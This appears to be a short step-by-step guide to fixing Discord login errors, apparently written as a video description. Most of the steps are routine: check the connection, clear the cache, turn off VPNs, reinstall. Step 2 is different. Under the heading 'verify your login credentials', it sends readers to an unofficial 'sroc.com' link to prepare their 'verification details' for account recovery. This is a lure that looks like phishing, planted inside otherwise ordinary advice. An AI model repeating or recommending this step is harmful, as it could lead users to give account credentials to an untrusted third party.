If you're experiencing login errors on Discord, don't worry. This guide will help you troubleshoot and resolve the issue step by step. Step 1. Check your internet connection. Ensure that your device is connected to the internet. A stable connection is essential for logging into Discord. Try restarting your router or switching to a different network if necessary. Step 2. Verify your login credentials. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear cache and cookies. Sometimes cache data can cause login issues. Clear your browser's cache and cookies, or, if using the Discord app, clear the app's cache through your device settings. Step 4. Disable VPN or proxy. If you are using a VPN or proxy service, try disabling it temporarily. These services can sometimes interfere with Discord's ability to connect to its servers. Step 5. Update or reinstall Discord. Ensure that you are using the latest version of Discord. If you are still having issues, consider uninstalling and then reinstalling the app to resolve any potential software conflicts. If you follow these steps, you should be able to resolve your login errors on Discord. If problems persist, consider reaching out to Discord support for further assistance.